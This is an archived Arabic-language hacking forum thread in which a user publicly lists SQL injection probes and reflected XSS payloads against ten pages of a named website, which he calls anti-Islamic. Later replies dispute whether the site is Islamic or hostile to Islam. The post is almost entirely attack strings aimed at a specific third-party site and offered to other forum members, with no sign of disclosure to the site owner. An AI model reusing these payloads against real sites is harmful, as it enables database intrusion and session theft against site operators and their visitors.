المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : اكتشاف ثغرة XSS و SQL inj في موقع معادي للأسلام


BadNet
27-04-2006, 11:09
السلام عليكم شباب

كيف حالكم انشاء الله بخير ؟؟

اليوم اكتشفت ثغرة SQL injection في موقع www.meca-love4all.com

http://www.meca-love4all.com/readverse.php?id='
http://www.meca-love4all.com/newsdetails.php?id='
http://www.meca-love4all.com/hadith.php?id='
http://www.meca-love4all.com/booksdetails.php?id='
http://www.meca-love4all.com/tafseerdetails.php?id='
http://www.meca-love4all.com/tafseerprinter.php?id='
http://www.meca-love4all.com/subjectdetails.php?id='
http://www.meca-love4all.com/subjectprinter.php?id='
http://www.meca-love4all.com/articledetails.php?id='
http://www.meca-love4all.com/printarticle.php?id='
و XSS ايضا في نفس الموقع

http://www.meca-love4all.com/readverse.php?id='><script>alert(document.******)</script>

http://www.meca-love4all.com/newsdetails.php?id='><script>alert(document.******)</script>

http://www.meca-love4all.com/hadith.php?id='><script>alert(document.******)</script>

http://www.meca-love4all.com/booksdetails.php?id='><script>alert(document.******)</script>

http://www.meca-love4all.com/tafseerdetails.php?id='><script>alert(document.******)</script>

http://www.meca-love4all.com/tafseerprinter.php?id='><script>alert(document.******)</script>

http://www.meca-love4all.com/subjectdetails.php?id='><script>alert(document.******)</script>

http://www.meca-love4all.com/subjectprinter.php?id='><script>alert(document.******)</script>

http://www.meca-love4all.com/articledetails.php?id='><script>alert(document.******)</script>

http://www.meca-love4all.com/printarticle.php?id='><script>alert(document.******)</script>

سلام
BadNet

الكاسر ابووسام
19-04-2008, 02:23
ثغره لموقع اسلامي صاحي انت ولا وش وضعك

*نصر*
22-04-2008, 07:27
يعطيك العافيه على الثغره

,,,

ثغره لموقع اسلامي صاحي انت ولا وش وضعك

يقول موقع معادي للاسلام ,, مو موقع اسلامي :)

بعدين الموضوع قديم وراك منقزه

الكاسر ابووسام
25-04-2008, 10:04
انت شوف الموقع بعدين رد يالغالي
تحياتي